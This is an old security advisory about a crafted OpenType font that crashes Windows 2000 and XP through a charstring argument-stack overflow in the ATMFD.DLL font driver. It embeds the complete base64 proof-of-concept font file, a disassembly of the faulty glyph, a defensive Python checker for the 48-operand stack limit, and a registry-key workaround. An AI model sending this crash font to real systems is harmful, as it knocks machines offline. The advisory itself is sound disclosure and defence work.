7th Jan 2003 [SBWID-5915]
COMMAND
Opentype font file causes Windows to restart
SYSTEMS AFFECTED
All current releases of Windows 2000 / XP
(Bug in ATMFD.DLL v ??)
PROBLEM
Thanks to Andrew's [aconnell@xtra.co.nz] post:
The attached OpenType font file will cause Windows to restart
immediately when the file is opened by the default viewer (fontview). I
doubt anyone would suspect a "harmless" little font file of being able
to cause such a thing to happen!
------------1F17417B20A411B0
Content-Type: application/octet-stream; name="restart.otf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="restart.otf"
T1RUTwAJAIAAAwAQQ0ZGIERAtN8AAACcAAAEZU9TLzJeXlwYAAAFBAAAAGBjbWFwAKECGgAABWQA
AAEkaGVhZNZUcTcAAAaQAAAANmhoZWEFzAI+AAAG1AAAACRobXR4Br3/+AAABsgAAAAMbWF4cAAD
UAAAAAaIAAAABm5hbWXxP5NIAAAG+AAAAxVwb3N0/58AMgAAChAAAAAgAQAEBAABAQEKcmVzdGFy
dGVyAAEBARz4EAD4GwL4GwP4GASDZfla+K4Fzw+S+vIS1BEAAQEBCnJlc3RhcnRlcgAAAQEAAAEA
UAADAgABAAQABwQL+IgO+IgOlfe2FZGKkoyNioqKioeMh4yIjIaMiIyGjIiMh4yKjIyMj4yNjJCM
jYyPjJCKkIqNio2KjJmKioSMhoyHjIaMiIyHjIeNjYyPjI+MjoyQjI+Mj4yRioyVioqJioqKhoqJ
ioeKiIqHioiKiIqHioiKh4qIioiKioONio6KkIqOio+KjoqPiYmKh4qIioeKiIqHioiKioOMio+K
joqPio6Kj4qOio6Kj4qOio+KjoqPio2KjIqMBtAWk4qngoqNioyIjHqKin6ZjYyMjH+JjYqMfnuf
jIyMjIyMjYyNjIOKh2aMjIyMtomNBvdzFpuKj4qNgYyIiY6KjIqMioyKjImMiYyAiomKiYqKioqK
ioqKiYqJioSKiYyFjIiMioyJjIqMioyKjIqNio6Kj4yOjIyMjIyMjoyRio2JjImMkoqMjI2KjIyR
ioqKiomKeoeNio2JioqKioqJiomKh4qEjIeMiIyJjIqMioyKjIqMioyKjIqNio2KjoqZjI6MjYyN
jIyMjIyMjIyMjIyMjIyNjI2MjYyOjAbnFpmKjoqNioyKjYqMioyKjIqMioyJjIqMiIyIjH6KiIqJ
iomKioqJioqKioqKiYqKiomKiYqIin2MiIyJjIqMiYyKjIqMioyKjIqNio2KjYqQipSMj4yNjI2M
jYyMjIyMjIyMjIyMjI2MjIyOjI2MBvuhihWaioqKioqKZoyKmoyOjIyMjI2MjYyMjImKhoqFdIqA
jYyNjLSKjIqMBrQWmoqKiopknIyNjIyNjI2MjIyIioKIiomMioqKjIeKgoyJioqMh4qDjYyMjLaJ
jAa1FpqKiX6KboyJjIqAioqMioqKjIuMjLaKjIqMBqIWmYqMioyJjIqMioyJjIqMiYyJjIqMiYyK
jImMioyJjIqMiYyKjImMioyKjIqMp4qMioyKjJaKiomKcYp5hIyKjYqMioyKjYqMio2KjIqNioyK
jYqMio2KjIqMio2KjIqNioyKjYqMio2KjYqMioyKjIppjIqMioyKiYyGioeMjI2MtYqMiowG8xad
ipCMmoqMfoqOio6KjImMgWSMio2KeYyNjIyMjLGBioqKioqKiYqIipCMk4yMBu0WmYqMioyJjIqM
iYyKjImMioyJjIqMiYyKjImMioyJjIqMiYyKjImMioyJjaeKjYmMloqKiYpoioKEjIqMio2KjIqN
ioyKjYqMio2KjIqNioyKjIqNioyKjYqMio2KjIqNioyKjYqMio2KjIqMimmMioyKg4qJjYyNjLOK
jYqMBl1uFYyIjImMiYyKjImMio2KjYqUjI2MjIyMjIyMjI2MjIyPjJOKkIqNio6KjIqNioyKjImM
iYyDiomKiYqKioqJioqKiIp9Bg4eoDlj/wwJAAAAAAICPwGQAAUAAAK8AooAAACMArwCigAAAd0A
MgD6AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAE5PTkUAQAAAAG8C7v9WAB4DwgAmAAAAAAAA
AAAB9AK8ACAAIAAAAAAAAwAAAAMAAAAcAAEAAAAAAEwAAwABAAAAHAAEADAAAAAIAAgAAgAAAAAA
IABv//8AAAAAACAAb///AAD/4f+TAAEAAAAAAAAAAAAGANgAAAAJAGcAAQAAAAAAAAABAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAgAAUAAAAwAAAAEAAAABAAD42ttZXw889QADA+gAAAAAuj/f+gAA
AAC6P05p//j/2gLGAhoAAAADAAIAAAAAAAAB9AAAAfQAAALV//gAAQAAAu7/VgAeAtX/+AAPAsYA
AQAAAAAAAAAAAAAAAAAAAAMAAAATAOoAAQAAAAAAAAAkAAAAAQAAAAAAAQAJACQAAQAAAAAAAgAH
AC0AAQAAAAAAAwAUADQAAQAAAAAABAAJACQAAQAAAAAABQAgAEgAAQAAAAAABgAJACQAAQAAAAAA
BwBRAGgAAQAAAAAAEAAJACQAAQAAAAAAEQAHAC0AAwABBAkAAABIALkAAwABBAkAAQASAQEAAwAB
BAkAAgAOARMAAwABBAkAAwAoASEAAwABBAkABAASAQEAAwABBAkABQBAAUkAAwABBAkABgASAQEA
AwABBAkABwCiAYkAAwABBAkAEgASAQFDb3B5cmlnaHQgMjAwMy4gQWxsIHJpZ2h0cyByZXNlcnZl
ZC5yZXN0YXJ0ZXJSZWd1bGFyMS4wMDA7Tk9ORTtyZXN0YXJ0ZXJPVEYgMS4wMDA7UFMgMDAxLjAw
MTtDb3JlIDEuMC4yOVBsZWFzZSByZWZlciB0byB0aGUgQ29weXJpZ2h0IHNlY3Rpb24gZm9yIHRo
ZSBmb250IHRyYWRlbWFyayBhdHRyaWJ1dGlvbiBub3RpY2VzLgBDAG8AcAB5AHIAaQBnAGgAdAAg
ADIAMAAwADMALgAgAEEAbABsACAAcgBpAGcAaAB0AHMAIAByAGUAcwBlAHIAdgBlAGQALgByAGUA
cwB0AGEAcgB0AGUAcgBSAGUAZwB1AGwAYQByADEALgAwADAAMAA7AE4ATwBOAEUAOwByAGUAcwB0
AGEAcgB0AGUAcgBPAFQARgAgADEALgAwADAAMAA7AFAAUwAgADAAMAAxAC4AMAAwADEAOwBDAG8A
cgBlACAAMQAuADAALgAyADkAUABsAGUAYQBzAGUAIAByAGUAZgBlAHIAIAB0AG8AIAB0AGgAZQAg
AEMAbwBwAHkAcgBpAGcAaAB0ACAAcwBlAGMAdABpAG8AbgAgAGYAbwByACAAdABoAGUAIABmAG8A
bgB0ACAAdAByAGEAZABlAG0AYQByAGsAIABhAHQAdAByAGkAYgB1AHQAaQBvAG4AIABuAG8AdABp
AGMAZQBzAC4AAAAAAwAAAAAAAP+cADIAAAAAAAAAAAAAAAAAAAAAAAAAAA==
------------1F17417B20A411B0--
Update (09 January 2003)
======
Kaspar Brand [ot@velox.ch] sent to the OpenType mailing list
[http://www.topica.com/lists/opentype] and BugTraq:
Further inspection of the font file shows that the problem is in the
CFF table - or more exactly, within the "o" character. Disassembling
the font with Just's excellent TTX
http://fonttools.sourceforge.net
produces the following result for the "o" character:
<CharString name="o">
10 290 rmoveto
6 -1 7 1 2 -1 -1 -1 -1 -4 1 -4 1 -3 1 -5 1 -3 1 -5 1 -3 1 -4
1 -1 1 1 1 4 1 2 1 5 1 2 1 4 1 5 -1 5 -1 2 -1 2 -1 1 14 -1 -1 -7 1 -5 1
-4 1 -5 1 -3 1 -4 1 -4 2 2 1 4 1 4 1 3 1 5 1 4 1 4 1 6 -1 1 10 -1 -1 -2
-1 -1 -1 -5 -1 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3
-1 -3 -1 -1 -8 2 -1 3 -1 5 -1 3 -1 4 -1 3 -1 4 -2 -2 -1 -4 -1 -3 -1 -4
-1 -3 -1 -4 -1 -3 -1 -1 -8 1 -1 4 -1 3 -1 4 -1 3 -1 4 -1 3 -1 3 -1 4 -1
3 -1 4 -1 3 -1 4 -1 2 -1 1 -1 1 hlineto
69 hmoveto
8 -1 28 -9 -1 2 -1 1 -3 1 -17 -1 -1 -13 14 2 1 1 1 -12 -2 2
-1 1 -13 -16 20 1 1 1 1 1 1 2 1 2 1 -8 -1 -4 -37 1 1 1 1 43 -2 2 hlineto
223 hmoveto
16 -1 4 -1 2 -10 1 -3 -2 3 -1 1 -1 1 -1 1 -1 1 -2 1 -2 1 -11
-1 -2 -1 -2 -1 -1 -1 -1 -1 -1 -1 -1 -2 -1 -2 -1 -7 -1 -2 1 -6 1 -3 1 -1
1 -2 1 -1 1 -1 1 -1 1 -1 2 -1 3 -1 4 1 3 1 1 1 1 1 1 3 1 6 -1 2 -2 1 -2
1 7 -1 1 1 2 -1 1 1 6 -1 -1 -1 -1 -2 -1 -17 -4 2 -1 2 -2 -1 -1 -1 -1 -1
-2 -1 -2 -1 -4 -1 -7 1 -4 1 -3 1 -2 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 2
-1 2 -1 3 -1 14 1 3 1 2 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 1 2 1 2 1 3 1
hlineto
[... some more hmoveto/hlineto stuff deleted ...]
endchar
</CharString>
Some simple experiments modifying this Charstring and reassembling the
font with TTX showed that the crash is caused by the arguments to the
hlineto operator. The Type 2 charstring specification
http://partners.adobe.com/asn/developer/pdfs/tn/5177.Type2.pdf
defines an implementation limit of 48 for the argument stack (Appendix
B, p.33) - but in some cases, the number of arguments to the hlineto
operator in this particular Charstring clearly exceeds this limit.
In the end, this apparently leads to a page fault (i.e. a "blue
screen") in ATMFD.DLL (the Type1/CFF font driver) - which shouldn't
happen in any case, of course. I guess the folks at Adobe need to fix
this.
BTW, checking the font with CFFChecker from the OpenType FDK gives a
"Type 2 stack overflow" for this character (which is not really
surprising, is it?).
--snipp--
This specific flavor of an OpenType font (CFF outlines, i.e.
"PostScript" data) is only supported natively by Windows 2000 and
later. For previous Windows versions, you need ATM (Adobe Type Manager)
to display such a font. Please note that the crash only occurs when
trying to render the "o" character (that's what fontview.exe tries to
do, of course).
As far as the creation of an embedded font for IE (.eot, embedded
OpenType) is concerned, I'm not sure if it's possible to trigger the
bug this way. When installing the "restarter" font and listing the
fonts available for embedding in WEFT, Microsoft's Web Embedding Fonts
Tool (the only publicly available tool I know of to create such fonts),
OpenType fonts with CFF outline data do not appear in the list of
available fonts. I suppose WEFT is currently limited to embed OpenType
fonts with TrueType outlines ("glyf" table) or plain PostScript Type 1
fonts (.pfb file suffix). The .eot format is not documented, as far as
I know, so creating such a font manually would probably require quite
some experimenting, and even then the question remains if IE would
actually be able to deal with this font format and display the
characters.
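The check Kaspar Brand describes can be reproduced without fontTools or Adobe's CFFChecker. The following is an added example written for this advisory, not code from the original posts, from TTX or from the OpenType FDK: a small Type 2 charstring assembler/decoder, following the operand encoding and operator codes in Adobe TN #5177, that raises as soon as a charstring pushes more than 48 operands before an operator reads them. The two sample charstrings are constructed here for illustration (the overlong one mirrors the shape of the "o" glyph above, whose first hlineto already carries well over 48 operands in the first two lines of the dump); they are not extracted from restart.otf.

```python
"""Type 2 charstring decoder with an argument-stack check (added example)."""
import struct

MAX_STACK = 48  # argument stack limit, Type 2 charstring spec, Appendix B

# One-byte operator codes from TN #5177 (escape 12 introduces two-byte ops).
OPERATORS = {
    1: "hstem", 3: "vstem", 4: "vmoveto", 5: "rlineto", 6: "hlineto",
    7: "vlineto", 8: "rrcurveto", 10: "callsubr", 11: "return",
    14: "endchar", 18: "hstemhm", 19: "hintmask", 20: "cntrmask",
    21: "rmoveto", 22: "hmoveto", 23: "vstemhm", 24: "rcurveline",
    25: "rlinecurve", 26: "vvcurveto", 27: "hhcurveto", 29: "callgsubr",
    30: "vhcurveto", 31: "hvcurveto",
}
OPCODES = {name: code for code, name in OPERATORS.items()}


class Type2StackOverflow(ValueError):
    """Raised when a charstring exceeds the 48-entry argument stack."""


def encode_number(n):
    """Encode an integer operand the way Type 2 charstrings do."""
    if -107 <= n <= 107:
        return bytes([n + 139])
    if 108 <= n <= 1131:
        n -= 108
        return bytes([(n >> 8) + 247, n & 0xFF])
    if -1131 <= n <= -108:
        n = -n - 108
        return bytes([(n >> 8) + 251, n & 0xFF])
    if -32768 <= n <= 32767:
        return b"\x1c" + struct.pack(">h", n)
    raise ValueError("operand out of range: %d" % n)


def encode_charstring(tokens):
    """Assemble a TTX-style token list (ints and operator names) into bytes."""
    out = bytearray()
    for tok in tokens:
        out += encode_number(tok) if isinstance(tok, int) else bytes([OPCODES[tok]])
    return bytes(out)


def _read_operand(data, i):
    """Decode the operand whose first byte is data[i]; return (value, next index)."""
    b = data[i]
    if b == 28:                                   # 16-bit signed integer
        return struct.unpack(">h", data[i + 1:i + 3])[0], i + 3
    if b <= 246:                                  # one-byte operand
        return b - 139, i + 1
    if b <= 250:                                  # two-byte positive
        return (b - 247) * 256 + data[i + 1] + 108, i + 2
    if b <= 254:                                  # two-byte negative
        return -(b - 251) * 256 - data[i + 1] - 108, i + 2
    return struct.unpack(">i", data[i + 1:i + 5])[0] / 65536.0, i + 5  # 16.16 fixed


def decode_charstring(data):
    """Yield (operator, operands) pairs; raise Type2StackOverflow on overflow."""
    stack, n_stems, i = [], 0, 0
    while i < len(data):
        b = data[i]
        if b >= 32 or b == 28:                    # operand: push it
            v, i = _read_operand(data, i)
            stack.append(v)
            if len(stack) > MAX_STACK:
                raise Type2StackOverflow("%d operands on stack at byte %d (limit %d)"
                                         % (len(stack), i, MAX_STACK))
            continue
        i += 1
        if b == 12:                               # two-byte escaped operator
            name = "escape_%d" % data[i]
            i += 1
        else:
            name = OPERATORS.get(b, "op_%d" % b)
        if name in ("hstem", "vstem", "hstemhm", "vstemhm"):
            n_stems += len(stack) // 2
        elif name in ("hintmask", "cntrmask"):
            n_stems += len(stack) // 2            # implicit vstem before first hintmask
            i += (n_stems + 7) // 8               # skip the mask bytes
        yield name, list(stack)
        stack = []
        if name == "endchar":
            return


def check_charstring(data):
    """Decode fully; returns the operator list or raises Type2StackOverflow."""
    return list(decode_charstring(data))


def charstring_is_safe(data):
    """True if the charstring stays within the Type 2 argument stack limit."""
    try:
        check_charstring(data)
        return True
    except Type2StackOverflow:
        return False


# Constructed samples (not taken from restart.otf): a benign glyph, and one
# whose hlineto pushes far more than 48 operands, like the "o" in the advisory.
BENIGN = encode_charstring([10, 290, "rmoveto", 6, -1, 7, 1, "hlineto", "endchar"])
OVERLONG = encode_charstring([10, 290, "rmoveto"] + [1, -1] * 30 + ["hlineto", "endchar"])

if __name__ == "__main__":
    for label, cs in (("benign", BENIGN), ("overlong", OVERLONG)):
        try:
            ops = check_charstring(cs)
            print(label, "ok:", [(op, len(args)) for op, args in ops])
        except Type2StackOverflow as exc:
            print(label, "REJECTED:", exc)
```

A renderer that allocates a fixed 48-slot operand stack and pushes without this bound check is exactly the pattern the page fault in ATMFD.DLL suggests; rejecting the charstring at the push, before any operator consumes the operands, is the cheap fix on the parsing side. The decoder does not follow callsubr/callgsubr into subroutines, so a charstring that hides the overflow inside a subroutine would need the same check applied to the subroutine bodies.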
SOLUTION
Patch
=====
?
Workaround
==========
Steven Tucker says:
On XP Professional SP1 it causes a bugcheck in ATMFD.DLL. According to
the properties for this DLL this is the Adobe Type Manager driver.
The bugcheck code is PAGE_FAULT_IN_NONPAGED_AREA @ Base+0x28A75.
You can delete the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers
This will eliminate the immediate problem, but will remove Type 1 font
support.